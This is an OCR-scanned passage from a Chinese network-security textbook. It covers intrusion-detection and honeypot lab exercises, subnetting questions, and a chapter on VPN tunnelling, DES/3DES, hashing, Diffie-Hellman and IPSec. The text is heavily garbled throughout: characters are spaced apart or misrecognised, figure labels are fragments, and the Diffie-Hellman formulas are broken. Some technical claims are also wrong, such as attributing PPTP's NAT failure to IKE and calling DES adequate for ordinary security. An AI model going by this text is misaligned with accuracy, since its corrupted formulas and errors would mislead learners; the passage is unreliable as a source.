C. 在 网 络 链 路 中 串 接 一 台 集 线 器 D. 在 网 络 链 路 中 串 接 一 台 交 换 机 
(17) 以 下 关于 基于 网 络 的 人 侵 检测 系统 的 优点 的 描述 不 正确 的 是 〈 入 
A. 可 以 提供 实时 的 网 络 行为 检测 B. 可 以 同时 保护 多 台 网 络 主机 
C. 具有 良好 的 隐蔽 性 D. 检测 性 能 不 受 硬件 条 件 限制 
(18) 以 下 关于 基于 网 络 的 人 侵 检测 系统 的 特点 的 说 明正 确 的 是 ( hs 
A. 防 人 侵 欺 骗 的 能 力 通常 比较 强 B. 检测 性 能 不 受 硬 件 条 件 限制 
C. 在 交换 式 网 络 环 境 中 难以 配置 D. 不 能 处 理 加 密 后 的 数据 
3. 网 络 安全 策略 设计 的 重要 内 容 之 一 是 确定 当 网 络 安全 受到 威胁 时 应 采取 的 应 急 措 
施 。 当 发 现 网 络 受到 非法 侵入 与 攻击 时 ,所 能 采取 的 行动 方案 基本 上 有 两 种 : 保护 方式 与 
跟踪 方式 。 请 根据 对 网 络 安全 知识 的 了 解 , 讨 论 以 下 几 个 问题 : 
(1) 当 网 络 受 到 非法 侵入 与 攻击 时 ,网 络 采用 保护 方式 时 应 该 采取 哪 两 个 主要 的 应 急 
措施 ? 
(2) 什么 情况 适应 于 采用 保护 方式 ( 试 举 出 3 种 情况 )? 
(3) 当 网 络 受到 非法 侵入 与 攻击 时 ,网 络 采用 跟踪 方式 时 应 该 采取 哪 两 个 主要 的 应 急 
措施 ? 
(4) 什么 情况 适应 于 采用 跟踪 方式 ( 试 举 出 3 种 情况 )? 
4. 网 络 安全 实例 分 析 。 
(1) 某 网 络 结构 如 图 6-4 所 示 ,请 回答 以 下 有 关 问 题 。 


图 6-4 网 络 结构 图 


@ 设备 1 应 选用 哪 种 网 络 设备 ? 

@ 若 对 整个 网 络 实施 保护 ,防火 墙 应 加 在 图 6-4 中 位 置 1 一 位 置 3 的 哪个 位 置 上 ? 

@ 如 果 采 用 了 入 侵 检测 设备 对 进出 网 络 的 流量 进行 检测 ,并 且 探测 器 是 在 交换 机 1 上 
通过 端口 镜像 方式 获得 流量 ,下 面 是 通过 相关 命令 显示 的 镜像 设置 的 信息 。 
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Session 1 


Type :Local Session 
Source Ports : 

Both :Gi2/12 
Destination Ports :Gi2/16 


请 问 探测 器 应 该 连接 在 交换 机 1 的 哪个 端口 上 ? 除了 流量 镜像 方式 外 ,还 可 以 采用 什 


么 方式 来 部 署 入 侵 检测 探测 器 ? 


@ 使 用 IP 地 址 202. 113. 10. 128/25 划分 4 个 相同 大 小 的 子 网 ,每 个 子 网 中 能 够 容纳 


30 台 主 机 ,请 写 出 子 网 掩 码 ` 各 个 子 网 网 络 地 址 及 可 用 的 IP 地 址 段 。 
(2) 某 网 络 结构 如 图 6-5 所 示 ,请 回答 以 下 有 关 问 题 。 


图 6-5 网 络 结构 图 


Q@ 使 用 192.168. 1. 192/26 划分 3 个 子 网 ,其 中 第 一 个 子 网 能 容纳 25 台 主 


机 ,另外 两 


个 子 网 分 别 能 容纳 10 台 主 机 ,请 写 出 子 网 掩 码 、 各 子 网 网 络 地 址 及 可 用 的 IP 地 址 段 。( 注 : 


请 按 子 网 序号 顺序 分 配 网 络 地 址 。) 


@ 如 果 该 网 络 使 用 上 述 地 址 ,边界 路 由 器 上 应 该 具有 什么 功能 ? 如 果 为 了 保证 外 网 能 
够 访问 到 该 网 络 内 的 服务 器 ,那么 边界 路 由 器 应 该 对 网 络 中 服务 器 的 地 址 进行 什么 样 的 


处 理 ? 


@ 采用 一 种 设备 能 够 对 该 网 络 提供 如 下 的 保护 措施 : 数据 包 进 入 网 络 时 将 被 过 滤 检 
测 ,并 确定 此 包 是 否 包含 威胁 网 络 安全 的 特征 。 如 果 检 测 到 一 个 恶意 的 数据 包 时 ,系统 不 但 


发 出 警报 ,还 将 采取 响应 措施 (如 丢弃 含有 攻击 性 的 数据 包 或 阻 断 连接 ) 阻 断 攻 
这 种 设备 的 名 称 。 这 种 设备 应 该 部 署 在 图 中 的 位 置 1 一 位 置 3 的 哪个 位 置 上 ? 

@ 如 果 该 网 络 采 用 Windows 2003 域 用 户 管理 功能 来 实现 网 络 资源 的 访问 
域 用 户 信息 存在 区 域 控制 器 的 哪个 部 分 ? 


全。 请 写 出 


控制 ,那么 


5. 入 侵 检测 的 作用 是 什么 ?入侵 检测 系统 与 防火 墙 有 什么 区 别 ? 试 分 析 两 者 在 防止 


端口 扫描 方法 上 的 异同 。 
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6. 人 侵 检测 的 原理 是 什么 ”常用 的 人 侵 检测 技术 有 哪 两 种 ? 使 用 不 同 检测 方法 的 人 
侵 检测 系统 主要 会 在 哪个 模块 上 有 差别 ? 

7. 设计 蜜 钠 ,车 必要 则 画 出 拓扑 。 

例如 ,以 系统 管理 员 身 份 设 计 一 段 后 台 程序 (或 者 一 个 小 程序 ) ,故意 开放 Windows( 或 
Linux) 下 的 服务 (如 Telnet\FTP), 当 有 人 通过 20、23 端口 进入 系统 ,并 且 执行 了 一 些 操作 ， 
程序 能 够 记录 这 些 登录 者 曾经 做 过 什么 破坏 的 手段 ,执行 过 什么 命令 ; 当 有 人 通过 Telnet、 
FTP 端口 登录 进入 的 时 候 , 程 序 能 够 自动 报警 ,以 便 引 起 系统 管理 员 的 注意 。 

(1) 写 出 实验 思路 。 

(2) 写 出 实验 过 程 (实验 可 以 使 用 相关 工具 软件 ,也 可 以 自行 编写 脚本 可 程序 ) ,包括 系 
统 方案 .实现 原理 .软件 流程 .系统 测试 方案 .测试 数据 ` 结 果 分 析 、 实 现 功能 、 源 代码 和 程序 
清单 (如 果 有 ) 等 。 

(3) 写 出 实验 体会 。 

8，Windows 蜜 龟 配置 实 验 。 通 过 Windows 下 的 Trap Server. exe 软件 ,熟悉 
Windows 下 的 蜜 钠 技 术 。 此 软件 是 一 个 适用 于 Windows 系统 的 蜜 钠 , 可 以 模拟 很 多 不 同 
的 服务 器 ,例如 Apache HTTP Server、Microsoft IIS 等 。 蜜 饶 运 行 时 就 会 开放 一 个 伪装 的 
Web 服务 器 ,虚拟 服务 器 将 对 这 个 服务 器 的 访问 情况 进行 监视 ,并 把 所 有 对 该 服务 的 访问 
记录 下 来 ,包括 IP 地 址 .访问 的 文件 等 。 通 过 这 些 日 志 可 对 黑客 的 人 侵 行 为 进行 简单 分 析 。 

实验 要 求 : 

(1) 掌握 安装 Trap Server。 

(2) 通过 相关 配置 ,按照 实验 步骤 写 一 份 完整 的 实验 报告 (要 求 有 截图 ) 。 

(3) 写 出 实验 体会 。 

9. Linux 蜜 饶 配 置 实验 。 通 过 Linux 下 的 Honeyd 软件 熟悉 蜜 饶 技 术 。 

实验 环境 ， 

硬件 : 局 域 网 内 联网 的 两 台 主 机 ,其 中 一 台 为 Linux 操作 系统 主机 ,用 作 安 装 蜜 饶 ; 另 
一 台 为 Windows 主机 ,对 蜜 缸 进行 扫描 。 

软件 : libdnet-1. 10. tar. gz, libevent-1. la. tar. gz, libpcap-0. 9. 3. tar. gz, honeyd-1. 0. 
tar. gz(Honeyd 源 代码 包 ) ,honeyd_kit-1. 0c-a. tar. gz( Honeyd 快速 安装 包 ),Superscan， 
Flashfxp( 或 其 他 FTP 客户 端 软 件 ) 。 

注意 : Windows 主机 的 默认 网 关 要 改 为 本 机 地 址 。 而 且 每 个 学 生 虚 拟 的 网 段 不 要 重 
党 ,可 以 通过 修改 start-arpd 和 start-honeyd 来 实现 。 

实验 步骤 : 

(1) 安装 Honeyd( 推 荐 使 用 快速 安装 包 ) 。 

(2) 配置 和 运行 Honeyd。 

(3) 测试 Honeyd。 

@ 测试 活动 主机 ,IP 地 址 为 192. 168. 1. 100 一 192. 168. 1. 253( 蜜 饶 虚 拟 地 址 ) 。 使 用 
Nmap 扫描 该 网 段 ,检测 主 机 是 否 活动 。 

@ 使 用 Nmap 检测 该 网 段 主机 的 开放 端口 。 

@ 测试 蜜 镀 的 虚拟 Web 服务 (在 浏览 器 中 输入 http://192. 168. 1. 100)。 

@ 测试 密 镀 的 虚拟 FTP 服务 (运行 Flashfxp, 登 录 192. 168. 1. 100)。 
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(4) Honeyd 虚拟 服务 脚本 。 

(5) Honeyd 日 志文 件 。 

实验 要 求 : 

(1) 掌握 快速 安装 方法 ,能够 熟练 安装 Honeyd。 尝 试 采用 手动 方法 安装 。 

(2) 通过 安装 和 配置 Honeyd, 按 照 实验 步骤 写 一 份 完整 的 实验 报告 (要 求 有 截图 ) 。 
(3) 尝试 手动 安装 Honeyd, 一 切 路 径 都 按照 默认 方式 。 

(4) 写 出 实验 体会 。 
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第 7 章 VPN 技术 


VPN( 虚 拟 专用 网 ) 提 供 数 据 的 安全 可靠 的 传输 .是 一 种 重要 的 信息 安全 技术 。 本 章 
介绍 VPN 技术 ,包括 相关 加 密 算法 简介 。 


7.1 基本 概念 


虚拟 专用 网 (Virtual Private Network ,VPN) 被 定义 为 通过 一 个 公用 网 络 ( 通 常 是 因 特 
网 ) 建 立 一 个 临时 的 、 安 全 的 连接 ,就 好 比 是 架设 了 一 条 专线 ,但 是 它 并 不 需要 真正 地 铺设 光 
缆 之 类 的 物理 线路 。 在 虚拟 专用 网 中 ,任意 两 个 节点 之 间 的 连接 并 没有 传统 专 网 所 需 的 端 
到 端的 物理 链 路 ,而 是 利用 公用 网 的 资源 动态 组 成 的 .“ 虚 拟 ” 的 意思 主要 是 指 这 种 网 络 并 
非 真实 存在 ,而 是 一 种 逻辑 上 的 网 络 。 

VPN 的 优势 还 在 于 它 可 以 很 好 地 利用 当前 既 有 的 Internet 线路 资源 ,不 再 受 地 域 的 限 
制 。 对 于 用 户 而 言 ,VPN 的 工作 方式 是 完全 透明 的 ,并 保证 数据 的 安全 传输 。 实 现 VPN 通 
信 的 方式 有 多 种 ,常见 的 有 IPSec VPN、PPTP VPN\、SSL VPN 等 。 

VPN 的 主要 目的 是 保护 从 信道 的 一 端 到 另 一 端 传输 的 信息 流 。 除 信道 的 两 端 以 外 ， 
VPN 不 提供 任何 的 数据 保护 。 

VPN 至 少 应 包括 以 下 基本 功能 : 

(1) 加 密 数 据 。 保 证 通过 公 网 传输 的 信息 即使 被 他 人 截获 也 不 会 泄露 。 

(2) 信息 验证 和 身份 识别 。 保 证 信息 的 完整 性 .合理 性 ,并 能 鉴别 用 户 的 身份 。 

(3) 提供 访问 控制 。 不 同 的 用 户 有 不 同 的 访问 权限 。 

(4) 地 址 管理 。 为 用 户 分 配 专 用 网 络 上 的 地 址 并 确保 地 址 的 安全 性 。 

(5) 密 钥 管理 。 生 成 并 更 新 客户 端 和 服务 器 的 加 密 密 钥 。 

(6) 多 协议 支持 。 支 持 公 共 网 络 上 普遍 使 用 的 基本 协议 ,包括 IP、IPX 等 。 

VPN 有 如 下 特性 : 

(1) 安全 性 : 隧道 ,加密 、 密 钥 管理 .数据 包 认 证 ,用户 认 证 .访问 控制 。 

(2) 可 靠 性 : 硬件 .软件 .基础 网 络 的 可 靠 性 。 

(3) 可 管理 性 : 记 账 .审核 .日 志 的 管理 ,是 否 支 持 集中 的 安全 控制 策略 。 

(4) 可 扩展 性 : 成 本 的 可 扩展 性 ,如 使 用 令 牌 卡 ,并 可 考虑 采用 硬件 加 速 加 解密 速度 。 

(5) 可 用 性 : 系统 对 应 用 透明 ,对 终端 用 户 来 说 使 用 方便 。 

(6) 互 操作 性 : 采用 标准 协议 .与 其 他 供应 商 的 设备 能 互通 。 

(7) 服务 质量 (QoS): 通过 Internet 连接 的 VPN 服务 质量 很 大 程度 上 取决 于 Internet 
的 状况 。 

(8) 多 协议 支持 。 


» 206 。 


7.2 VPN 协 议 


7.2.1 VPN 安全 技术 


VPN 主要 采用 以 下 4 项 技术 来 保证 安全 ,其 中 隧道 技术 是 VPN 的 基本 技术 。 
(1) 隧道 技术 ,是 指 包括 数据 封装 ,传输 和 解 包 在 内 的 全 过 程 。 

(2) 加 解密 技术 。 

(3) 密 钥 管理 技术 。 

(4) 用 户 与 设备 身份 认证 技术 。 


7.2.2 VPN 的 隧道 协议 


采用 隧道 技术 可 以 模仿 点 对 点 连接 技术 (如 图 7-1 中 的 虚线 所 示 ) ,依靠 Internet 服务 
提供 商 (ISP) 和 其 他 的 网 络 服务 提供 商 (NSP) 在 公用 网 中 建立 自己 专用 的 隧道 ,让 数据 包 通 
过 这 条 隧道 安全 传输 。 对 于 不 同 的 信息 来 源 ,可 分 别 给 它们 开 出 不 同 的 隧道 。 
一 般 连 接 通 道 


图 7-1 VPN 隧道 


隧道 是 一 种 利用 公 网 设施 ,在 一 个 网 络 之 中 的 “网 络 *" 上 传输 数据 的 方法 。 隧 道 协 议 利 
用 附加 的 报头 封装 帧 ,附加 的 报头 提供 了 路 由 信息 ,因此 封装 后 的 包 能 够 通过 中 间 的 公 网 。 
封装 后 的 包 所 途经 的 公 网 的 逻辑 路 径 称 为 隧道 。 一 旦 封装 的 帧 到 达 了 公 网 上 的 目的 地 , 帧 
就 会 被 解除 封装 并 被 继续 送 到 最 终 目 的 地 。 

隧道 本 身 是 封装 数据 经 过 的 逻辑 数据 路 径 ,对 原始 的 源 和 目的 端 ,隧道 是 不 可 见 的 ,而 
只 能 看 到 网 络 路 径 中 的 点 对 点 连接 。 连 接 双 方 并 不 关心 隧道 起 点 和 终点 之 间 的 任何 路 由 
器 .交换 机 、 代 理 服务 器 或 其 他 安全 网 关 。 

隧道 包括 以 下 基本 要 素 

(1) 隧道 开通 器 (TI) 。 

(2) 有 路 由 能 力 的 公用 网 络 。 

(3) 一 个 或 多 个 隧道 终止 器 (TT) 。 

(4) 必要 时 增加 一 个 隧道 交换 机 以 增加 灵活 性 。 

隧道 可 以 通过 隧道 协议 来 实现 。 根 据 是 在 OSI 模型 的 第 二 层 还 是 第 三 层 实现 隧道 , 隧 
道 协议 分 为 第 二 层 隧 道 协议 和 第 三 层 隧道 协议 。 在 网 络 层 实 现 数据 封装 的 协议 称 第 三 层 隧 
道 协议 ,IPSec 就 属于 这 种 协议 类 型 ;在 数据 链 路 层 实现 数据 封装 的 协议 称 第 二 层 隧道 协 
议 , 常 用 的 有 PPTP、L2TP 等 。 

1. 第 二 层 隧道 协议 

第 二 层 隧道 协议 是 将 整个 PPP 帧 封装 在 内 部 隧道 中 。 现 有 的 第 二 层 隧道 协议 有 以 下 
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几 种。 

(1) PPTP(Point-to-Point Tunneling Protocol) : 该 协议 支持 点 到 点 协议 (PPP) 在 IP 网 
络 上 的 隧道 封装 ,PPTP 作为 一 个 呼叫 控制 和 管理 协议 ,使 用 一 种 增强 的 GRE (Generic 
Routing Encapsulation, 通 用 路 由 封装 ) 技 术 为 传输 的 PPP 报 文 提供 流 控 和 拥塞 控制 的 封装 
服务 。 

PPTP 协议 允许 对 IP、IPX 或 NetBEUI 数据 流 进行 加 密 , 然 后 封装 在 IP 包头 中 通过 企 
业 IP 网 络 或 公共 网 络 发 送 。 如 果 有 防火 墙 或 使 用 了 地 址 转换 ,PPTP 可 能 无 法 工作 。 因 为 
IKE(Internet Key Exchange, 因 特 网 密 钥 交换 ) 协 商 中 所 携带 的 IP 地 址 不 允许 被 NAT 改 
变 , 对 地 址 的 任何 修改 都 会 导致 完整 性 检查 失效 。 

(2) L2TP(Layer 2 Tunneling Protocol) : L2TP 既 可 用 于 实现 拨号 VPN 业务 ,也 可 用 
于 实现 专线 VPN 业务 。 

L2TP 协议 允许 对 IP、IPX 或 NetBEUI 数据 流 进行 加 密 . 然 后 通过 支持 点 对 点 数据 报 
传递 的 任意 网 络 发 送 , 如 IP、X. 25、 帧 中 继 或 ATM。 

PPTP 和 L2TP 集成 在 Windows 中 ,所 以 较 常 用 。 

2. 第 三 层 隧道 协议 

第 三 层 隧道 协议 的 起 点 与 终点 均 在 ISP 内 ,PPP 会 话 终 止 在 网 络 访问 服务 器 (NAS) 
处 ,隧道 内 只 携带 第 三 层 报 文 。 现 有 的 第 三 层 隧道 协议 主要 有 以 下 几 种 。 

(1) GRE(Generic Routing Encapsulation) 协 议 : 这 是 通用 路 由 封装 协议 ,是 NAS 用 于 
实现 任意 一 种 网 络 层 协议 在 另 一 种 网 络 层 协议 上 的 封装 。 

(2) IPSec(IP Security) 协 议 : IPSec 协议 不 是 一 个 单独 的 协议 , 它 给 出 了 IP 网 络 上 数 
据 安全 的 一 整套 体系 结构 ,包括 AH(Authentication Header) ,ESP(Encapsulating Security 
Payload) ,IKE(Internet Key Exchange) 等 协议 。IPSec 隧道 模式 允许 对 IP 负载 数据 进行 
加 密 , 然 后 封装 在 IP 包头 中 通过 企业 IP 网 络 或 公共 IP 网 络 ( 如 Internet) 发送 。 

GRE 和 IPSec 主要 用 于 实现 专线 VPN 业务 。 


7.2.3 VPN 的 类 型 


VPN 的 分 类 方法 比较 多 ,实际 使 用 中 ,需要 通过 客户 端 与 服务 器 端的 交互 实现 认证 与 
隧道 建立 。 基 于 二 层 、 三 层 的 VPN 都 需要 安装 专门 的 客户 端 系统 (硬件 或 软件 ) 以 完成 
VPN 相关 的 工作 。 

一 个 VPN 解决 方案 不 仅仅 是 一 个 经 过 加 密 的 隧道 , 它 包 含 访问 控制 认证、 加密、 隧道 
传输 、 路 由 选择 ,过滤 、 高 可 用 性 、 服 务 质量 以 及 管理 。 

1. 按 VPN 的 应 用 方式 分 类 

VPN 从 应 用 的 方式 上 分 为 两 种 基本 类 型 : 拨号 VPN 与 专用 VPN。 

拨号 VPN 又 分 为 两 种 : 在 用 户 PC 上 或 在 服务 提供 商 的 NAS 上 。 

专用 VPN 有 多 种 形式 。IP VPN 的 发 展 促使 骨干 网 建立 VPN 解决 方案 ,形成 了 基于 
MPLS(Multi-Protocol Label Switching ,多 协议 标签 交换 ) 的 IJP VPN 技术 。MPLS VPN 的 
优点 是 全 网 统一 管理 的 能 力 很 强 , 由 于 MPLS VPN 是 基于 网 络 的 ,全 部 的 VPN 网 络 配置 
和 VPN 策略 配置 都 在 网 络 端 完成 ,可 以 大 大 降低 管理 维护 的 开销 。 
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2. 按 VPN 的 应 用 平台 分 类 

VPN 的 应 用 平台 分 为 3 类 : 软件 平台 、 专 用 硬件 平台 及 辅助 硬件 平台 。 

(1) 软件 平台 VPN。 当 对 数据 连接 速率 要 求 不 高 ,对 性 能 和 安全 性 需求 不 强 时 ,可 以 
利用 一 些 软 件 公 司 所 提供 的 完全 基于 软件 的 VPN 产品 来 实现 简单 的 VPN 功能 。 

(2) 专用 硬件 平台 VPN。 使 用 专用 硬件 平台 的 VPN 设备 可 以 满足 企业 和 个 人 用 户 对 
提高 数据 安全 及 通信 性 能 的 需求 ,尤其 是 从 通信 性 能 的 角度 来 看 ,专用 的 硬件 平台 可 以 实现 
数据 加 密 及 数据 乱码 等 对 CPU 处 理 能 力 需求 很 高 的 功能 。 

(3) 辅助 硬件 平台 VPN。 这 类 VPN 介 于 软件 平台 和 指定 硬件 平台 之 间 , 主 要 是 指 以 
现 有 网 络 设备 为 基础 ,再 增添 适当 的 VPN 软件 以 实现 VPN 的 功能 。 

3. 按 VPN 的 协议 分 类 

VPN 协议 主要 是 指 构建 VPN 的 隧道 协议 。VPN 的 隧道 协议 可 分 为 第 二 层 隧道 协议 、 
第 三 层 障 道 协议 。 第 二 层 隧道 协议 最 典型 的 有 PPTP、L2TP 等 ,第 三 层 障 道 协议 有 GRE、 
IPSec 等 。 

第 二 层 隧 道 和 第 三 层 隧道 的 本 质 区 别 在 于 ,在 隧道 里 传输 的 用 户 数据 包 是 被 封装 在 哪 
一 层 的 数据 包 中 。 第 二 层 隧 道 协议 和 第 三 层 隧道 协议 通常 分 别 使 用 ,合理 地 运用 两 层 协议 
可 取得 更 好 的 安全 性 。 

4. 按 VPN 的 服务 类 型 分 类 

根据 服务 类 型 ,VPN 业务 按 用 户 需 求 定义 以 下 3 种 : 企业 内 部 虚拟 网 (Internet VPN)、 
远程 访问 虚拟 网 (Access VPN) 与 企业 扩展 虚拟 网 (Extranet VPN)。 

(1) 企业 内 部 虚拟 网 (Intranet VPN) 。 即 企业 的 总 部 与 分 支 机 构 间 通过 公 网 构筑 的 虚 
拟 网 。 这 种 类 型 的 连接 带 来 的 风险 最 小 ,因为 公司 通常 认为 他 们 的 分 支 机 构 是 可 信 的 ,并 将 
它 作 为 公司 网 络 的 扩展 。 内 部 网 VPN 的 安全 性 取决 于 两 个 VPN 服务 器 之 间 加 密 和 验证 
的 方法 ,如 图 7-2 所 示 。 


一 本 中 ~ 
未 下 ~ 


可 a 7 -一 一 、 ee 2 
国 = Internet > 


Router Router 


总 部 LAN VPN 服务 器 VPN 服 务 器 分 支 机 构 LAN 
图 7-2 Intranet VPN 


(2) 远程 访问 虚拟 网 (Access VPN) 。 又 称 为 拨号 VPN( 即 VPDN), 是 指 企业 员工 或 企 
业 的 小 分 支 机 构 通过 公 网 远程 拨号 的 方式 构筑 的 虚拟 网 。 典 型 的 远程 访问 VPN 是 用 户 通 
过 本 地 的 信息 服务 提供 商 (ISP) 登录 到 因特网 上 ,并 在 现 有 的 办 公 室 和 公司 内 部 网 之 间 建 
立 一 条 加 密 信道 ,如 图 7-3 所 示 。 

(3) 企业 扩展 虚拟 网 (Extranet VPN) 。 即 企业 间 发 生 收购 .兼并 或 企业 间 建 立 战略 联 
盟 后 ,使 不 同 企业 网 通过 公 网 来 构筑 的 虚拟 网 。 它 能 保证 包括 TCP 和 UDP 服务 在 内 的 各 
种 应 用 服务 的 安全 ,如 E-mail.HTTP、FTP、RealAudio, 数 据 库 的 安全 以 及 一 些 应 用 程序 如 
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Java、ActiveX 的 安全 ,如 图 7-4 所 示 。 
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总 部 LAN VPN 服务 器 ”防火 墙 防火 墙 VPN 服 务 器 合作 伙伴 LAN 


图 7-4 Extranet VPN 


5. 按 VPN 的 部 署 模式 分 类 

部 署 模式 从 本 质 上 描述 了 VPN 的 通道 是 如 何 建立 和 终止 的 ,一 般 有 3 种 VPN 部 署 
模式 。 

(1) 端 到 端 (End-to-End) 模 式 。 是 典型 的 由 自 建 VPN 的 客户 所 采用 的 模式 ,最 常见 的 
隧道 协议 是 IPSec 和 PPTP。 

(2) 供应 商 - 企 业 (Provider-Enterprise) 模 式 。 隧 道 通常 在 VPN 服务 器 或 路 由 器 中 创 
建 ,在 客户 前 端 关 闭 。 在 该 模式 中 ,客户 不 需要 购买 专门 的 隧道 软件 ,由 服务 商 的 设备 来 建 
立 通 道 并 验证 。 最 常见 的 隧道 协议 有 L2TP 和 PPTP。 

(3) 内 部 供应 商 (Intra-Provider) 模 式 。 服 务 商 保持 了 对 整个 VPN 设施 的 控制 。 在 该 
模式 中 ,通道 的 建立 和 终止 都 是 在 服务 商 的 网 络 设施 中 实现 的 。 客 户 不 需要 做 任何 实现 
VPN 的 工作 。 


7.3 ”加 密 系统 简介 


.3.1 DES 


DES 是 一 个 分 组 加 密 算法 ,以 64 位 为 分 组 对 数据 加 密 。 同 时 DES 也 是 一 个 对 称 算法 : 

加 密 和 解密 用 的 是 同一 个 算法 。 它 的 密 钥 长 度 是 56 位 (每 个 第 8 位 都 用 作 奇 偶 校 验 ) , 密 钥 

可 以 是 任意 的 56 位 的 数 , 而 且 可 以 在 任意 时 候 改 变 。 其 中 有 极 少量 的 数 被 认为 是 弱 密 钥 ， 
R 


但 是 很 容易 避 开 它们 。 所 以 保密 性 依赖 于 密 钥 。DES 的 蔡 代 品 是 AES( 高 级 加 密 标 准 ) 。 
AES 已 经 成 为 对 称 密 钥 中 最 流行 的 算法 之 一 。 


7.3.2 3DES 


3DES 算法 策略 与 DES 方式 一 致 ,不 同 的 是 3DES 先 对 数据 加 密 一 次 ,对 第 一 次 加 密 结 
果 再 加 密 一 次 ,对 第 二 次 加 密 结果 再 加 密 一 次 。 每 次 加 密 所 使 用 的 密 钥 均 不 相同 。 这 一 操 
作 明 显 增加 了 遍历 法 攻击 的 难度 。 

以 上 两 种 算法 都 是 对 称 加 密 ( 加 密 解 密使 用 同样 的 密 钥 ) 。 


7.3.3 散 列 算法 


散 列 (Hash) 算 法 是 一 种 单 向 算法 ,对 被 保护 报 文 进行 计算 获得 固定 长 度 的 散 列 值 , 但 
不 能 从 计算 结果 反 算 出 原始 报 文 。 散 列 算 法 就 像 是 没有 私 钥 的 公开 密 钥 算法 ,一旦 算法 产 
生 了 散 列 值 ,因为 没有 私有 密 钥 ,所 以 就 无 法 通过 散 列 值 反 算出 原文 。 

(1) MD5(Message Digest 5 ,消息 摘要 算法 5) 是 一 种 散 列 算法 ,得 到 128 位 的 散 列 ( 摘 
要 ) 值 。HMAC 是 一 种 密 钥 认 证 算法 ,基于 MD5 的 新 标准 一 一 HMAC-MD5-96, 即 只 取 所 
得 散 列 值 中 最 高 的 96 位 为 有 效 值 。 

(2) SHA(Security Hash Algorithm ,安全 散 列 算法 ) ,SHA 也 是 一 种 散 列 算法 , 它 可 以 
对 任意 长 度 的 报 文 进行 散 列 计算 ,得 到 160 位 的 散 列 ( 摘 要 ) 值 。 基 于 SHA 的 新 标准 一 一 
HMAC-SHA-96, 取 所 得 散 列 值 中 最 高 的 96 位 为 有 效 值 。 


7.3.4 Diffie-Hellman 
Diffie -Hellman(DH) 是 密 钥 交 换算 法 ,该 算法 如 图 7-5 所 示 。 


c=g" modp 


dmodp 


共享 密 钥 de mod p=c* mod p=g* modp 
图 7-5 Diffie -Hellman 算法 示意 图 


(1) 需 进行 DH 交换 的 双方 各 自 产生 一 个 随机 数 ,如 a 和 0。 
(2) 使 用 双方 确认 的 、 共 享 的 、 公 开 的 两 个 参数 : 底数 g 和 模 数 p 各 自用 随机 数 a 5 进 
行 客 模 运算 ,得 到 结果 c 和 4d ,计算 公式 如 下 : 
c=g modp, d=g’ modp 
(3) 双方 进行 模 交 换 。 
» Bl 。 


(4) 进一步 计算 ,得 到 DH 公有 值 : 
d*modp=cemodp=g” modp 
此 值 就 是 共享 密 钥 。 


7.4 IPSec 协议 


7.4.1 IPSec 体系 结构 


IPSec(IP Security,IP 安全 ) 协 议 是 应 用 于 IP 层 上 网 络 数据 安全 的 一 整套 体系 结构 , 包 
括 网 络 认 证 协议 AH (Authentication Header, 认证 头 )、ESP (Encapsulating Security 
Payload ,封装 安全 载荷 ) IJKE(Internet Key Exchange, 因 特 网 密 钥 交换 ) 和 用 于 网 络 认 证 及 
加 密 的 一 些 算法 等 。 其 中 ,AH 协议 和 ESP 协议 用 于 提供 安全 服务 ,IKE 协议 用 于 密 钥 
交换 。 

图 7-6 中 ,解释 域 (DOI) 通 过 一 系列 命令 .算法 、 属 性 和 参数 连接 所 有 的 IPSec 组 文件 。 
策略 决定 两 个 实体 之 间 能 和 否 通 信 , 以 及 如 何 进行 通信 。 
IPSec 安全 体系 结构 


| 


ESP 协 议 AH 协 议 


1 
加 密 算法 鉴别 算法 | 


下 
一 | 解释 域 (DOD 


密 钥 管 理 协议 (IKE) 一 一 策略 SA 


图 7-6 IPSec 安全 体系 结构 


IPSec VPN 的 实现 包含 管理 模块 、 密 钥 分 配 和 生成 模块 .身份 认 证 模块 .数据 加 密 / 解 
密 模块 .数据 分 组 封装 /分 解 模块 和 加 密 函 数 库 几 部 分 组 成 ,如 图 7-7 所 示 。 


7.4.2 IPSec 的 3 个 主要 协议 


IPSec 属于 3 层 协议 ,该 协议 基于 TCP/IP 的 标准 协议 ,仅仅 传输 人 P 协议 数据 包 。 该 协 
议 已 经 集成 到 IPv6 中 ,在 IPv4 中 它 是 一 个 可 选 扩展 协议 。IPSec 提供 了 强大 的 安全 、 加 密 、 
认证 和 密 钥 管理 功能 ,适合 大 规模 VPN 使 用 。IPSec 协议 需要 认证 中 心 (CA) 来 进行 身份 
认证 和 分 发 用 户 的 公共 密 钥 。 

IPsec 提供 了 两 种 安全 机 制 : 认证 和 加 密 。 认 证 机 制 使 IP 通信 的 数据 接收 方 能 够 确认 
数据 发 送 方 的 真实 身份 以 及 数据 在 传输 过 程 中 是 否 遭 自 改 。 加 密 机 制 通 过 对 数据 进行 加 密 
运算 来 保证 数据 的 机 密 性 ,以 防 数据 在 传输 过 程 中 被 窃听 。IPSec 协议 中 的 AH 协议 定义 

a 


上 一 加 密 函 数 库 
ee 是 密 钥 分 配 和 | 身份 | 数据 加 密 / 
模 生成 模块 。| 认 证 模块 | 解密 模块 
器 Telnet 
Intranet 用 户 一 一 数据 分 组 封装 /分 解 模块 


图 7-7 IPSec VPN 系统 的 组 成 


了 认证 的 应 用 方法 ,提供 数据 源 认 证 和 完整 性 保证 ;ESP 协议 定义 了 加 密 和 可 选 认证 的 应 
用 方法 ,提供 数据 可 靠 性 保证 。 

IPSec 的 3 个 主要 协议 是 ESP、AH.IKE。 

1，ESP 协议 

ESP 协议 (IP 协议 号 为 50) 提 供 加 密 、 数 据 源 认证 、 数 据 完整 性 校 验 和 防止 报 文 重 放 功 
能 。ESP 的 工作 原理 是 : 在 每 一 个 数据 包 的 标准 IP 包头 后 面 添加 一 个 ESP 报 文 头 ,并 在 
数据 包 后 面 追加 一 个 ESP 尾 。 与 AH 协议 不 同 的 是 ,ESP 将 需要 保护 的 用 户 数 据 进行 加 密 
后 再 封装 到 IP 包 中 ,以 保证 数据 的 机 密 性 。 常 见 的 加 密 算法 有 DES、3DES、AES 等 。 同 
时 ,作为 可 选项 ,用 户 可 以 选择 MD5、SHA-1 算法 保证 报 文 的 完整 性 和 真实 性 。 这 3 个 加 
密 算 法 的 安全 性 由 高 到 低 依次 是 AES.3DES.DES, 安 全 性 高 的 加 密 算 法 实现 机 制 复杂 , 运 
算 速 度 慢 。 对 于 普通 的 安全 要 求 ,DES 算法 就 可 以 满足 需要 。 

ESP 可 在 传输 模式 以 及 隧道 模式 下 使 用 。ESP 头 可 以 位 于 IP 头 与 上 层 协议 之 间 ,或 
